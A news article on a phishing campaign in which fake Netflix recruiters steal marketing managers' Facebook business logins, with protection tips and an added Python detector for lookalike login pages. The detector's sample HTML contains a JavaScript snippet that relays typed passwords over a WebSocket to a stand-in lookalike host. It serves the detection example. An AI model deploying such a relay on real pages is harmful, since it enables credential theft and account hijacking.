
Scammers posing as Netflix job recruiters are targeting social media and marketing managers in a new phishing campaign designed to hijack their employers’ Facebook business accounts. Here's what to look out for.
- Phishing emails impersonating Netflix recruiters target marketing staff with fake high-level job offers.
- The Netflix phishing sites trick victims into giving up their Facebook business account credentials in real time.
- Hijacked accounts can be exploited to run malicious ads, demand ransom, or spread further scams.
New research by Malwarebytes says the scammers are sending out phishing emails to marketing employees, pretending to be Netflix job recruiters looking to fill lucrative positions at the streaming service company.
“The initial mail looks like what you might expect from a headhunter or a human resources (HR) recruitment specialist,” said Pieter Arntz, Malware Intelligence Researcher at Malwarebytes.
“I hope this note finds you well. Your reputation as a visionary marketing leader has caught our attention, and I’d like to share an extraordinary opportunity with you at Netflix,” the email states.
The email will praise the employee’s skill and leadership qualities, inviting them to apply for various high-profile jobs by scheduling “an interview with the ‘Netflix HR team.’”
Luring victims with lucrative job offers
These phishing campaigns are explicitly designed to steal the credentials of marketing managers, social media staff, and especially those who have access to company Facebook Pages or business accounts, the Malwarebytes research states.
Some of the job titles offered up in the phish: “Vice President of Marketing,” “Digital Marketing Manager,” and “Director of Social Media.”
Gaining access to a Facebook business account allows the bad actors to “run malicious ads using the company’s payment methods, demand a ransom for return of control over the account, or use the company’s reputation to spread more scams,” the research said.
Arntz said it looks as if the scammers have performed OSINT on their marks: the roles offered are pitched at each target's actual seniority, so the offer seems plausible to that particular job seeker.
Here’s how it works
If the job seeker clicks the link in the email, they are taken to a fake Netflix website where they are asked to create a “Career Profile,” with an option to link that profile to their Facebook account.
The fraudulent Netflix website built by the attackers appears to be “a mix of content copied from the actual Netflix site and from the phishing campaign,” Arntz said.
“At this stage, all red flags should go up,” Arntz says. Whether the job seeker chooses to complete their profile by clicking “Continue with Facebook” or “Continue with Email,” a new screen pops up asking them to sign in to their Facebook account. Either path lands on the same attacker-controlled login page.
“It’s very normal practice to offer the option of logging in with Facebook on third-party sites, so it would be understandable for the job seeker to click that link,” Arntz explains.
Once the victim enters their login information, they are shown a “The password you’ve entered is incorrect. Please try again!” prompt regardless of what they typed.
It is this Facebook login page that makes the attack “very sophisticated,” Arntz points out.
The page relays the credentials to the attackers over a WebSocket as they are being typed, so the scammers can “log into your real Facebook account within seconds,” he says.
“They could potentially ask for multi-factor authentication (MFA) confirmation if that’s necessary, too,” Arntz added.
Furthermore, the malware researcher notes that because everything is happening live, the victim has no idea their Facebook account is being accessed.
This also gives the scammers time to do a number of things with the victim's account, such as “log you out, spam your friends, or whatever else they want,” he said.
How to protect yourself
Malwarebytes says there are a number of steps job seekers can take to protect themselves from these kinds of phishing attacks, including:
- Always be cautious with job offers for positions you never applied for.
- Carefully check the website URL and the sender's email address for typos or inconsistencies.
- Check that the address in the browser bar matches what you expect to see, and that it matches the content of the website.
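As an added illustration (not code from Malwarebytes, Netflix or Facebook), the script below applies the two checks a practitioner would make on a page like the one described in the “Here’s how it works” section: whether the host in the address bar actually belongs to the brand the login page presents, and where the typed password goes, both the form’s action and any WebSocket endpoint the page opens. The phishing URL, HTML and WebSocket endpoint are constructed for the example, not taken from the campaign; the two-label registrable-domain shortcut is an assumption that a production check would replace with the Public Suffix List.

```python
# Added example for this article; not Malwarebytes', Netflix's or Facebook's code.
# It applies the two checks discussed above (does the address bar belong to the
# brand on the page, and where do the typed credentials actually go) to a
# constructed sample. The hostnames, URLs and HTML below are made up.
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hypothetical lookalike hostname of the "brand.com.<other-domain>" kind; constructed.
PHISH_URL = "https://netflix.com.careers-apply.example/facebook/login"
PHISH_HTML = """
<h1>Log in to Facebook to continue</h1>
<form action="/auth/submit" method="post">
  <input name="email"><input type="password" name="pass">
  <button>Log In</button>
</form>
<script>
  // Relay each keystroke to the operator as it is typed (the live interception
  // the article describes), so the real login can be attempted within seconds.
  const ws = new WebSocket("wss://netflix.com.careers-apply.example/live");
  document.querySelector("[name=pass]").addEventListener("input",
      e => ws.send(e.target.value));
</script>
"""

# A constructed stand-in for a genuine first-party login page.
GENUINE_URL = "https://www.facebook.com/login.php"
GENUINE_HTML = """
<form action="/login/" method="post">
  <input name="email"><input type="password" name="pass">
</form>
"""

WS_RE = re.compile(r"wss?://[^\s'\"<>]+")


def registrable_domain(host: str) -> str:
    """Last two DNS labels. Fine for brand.com checks; real code should
    consult the Public Suffix List so that e.g. example.co.uk is handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_belongs_to(host: str, brand: str) -> bool:
    return bool(host) and registrable_domain(host) == brand


def url_problem(url: str, brand: str):
    """Return why this URL should not be trusted as *brand*, or None if it looks fine."""
    host = urlparse(url).hostname or ""
    if any(label.startswith("xn--") for label in host.split(".")):
        return f"{host!r} uses punycode (possible homoglyph domain)"
    if not host_belongs_to(host, brand):
        return f"{host!r} is not under {brand} (registrable domain is {registrable_domain(host)!r})"
    return None


class PasswordFormParser(HTMLParser):
    """Collect the action URL of every form that contains a password field."""
    def __init__(self):
        super().__init__()
        self._action = None
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._action = a.get("action", "")
        elif tag == "input" and a.get("type", "").lower() == "password" and self._action is not None:
            self.password_form_actions.append(self._action)

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None


def analyze_login_page(page_url: str, html: str, brand: str = "facebook.com"):
    """Return a list of findings; an empty list means nothing looked off."""
    findings = []
    problem = url_problem(page_url, brand)
    if problem:
        findings.append("address bar: " + problem)
    parser = PasswordFormParser()
    parser.feed(html)
    for action in parser.password_form_actions:
        target = urlparse(urljoin(page_url, action)).hostname or ""
        if not host_belongs_to(target, brand):
            findings.append(f"password form posts to {target!r}, not {brand}")
    for ws_url in WS_RE.findall(html):
        target = urlparse(ws_url).hostname or ""
        if not host_belongs_to(target, brand):
            findings.append(f"WebSocket to {target!r} on a {brand} login page")
    return findings


if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (GENUINE_URL, GENUINE_HTML)):
        print(url, "->", analyze_login_page(url, html) or ["looks consistent"])
```

A genuine “Continue with Facebook” button hands off to a dialog on facebook.com rather than rendering a password field on the third-party page, so a password form or a WebSocket living on a non-Facebook host is a signal worth acting on. The WebSocket check is only a heuristic: a page can open the socket from a separately loaded script that this regex never sees, which is why the address-bar check comes first.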
Malwarebytes also recommends that everyone learn how to spot and recognize phishing attempts, especially as cybercriminals increasingly use AI to help create phishing emails and fake websites.
Additionally, ensure internet browsers, software, and operating systems are kept up to date, and use real-time anti-malware solutions with web protection.
Those who think they might have been phished should “immediately change your passwords, enable multi-factor authentication, and notify your company’s IT/security team,” it said.
Malwarebytes said the phishing site itself was being served from behind Cloudflare's reverse-proxy service. Both Netflix and Cloudflare have since been made aware of the findings.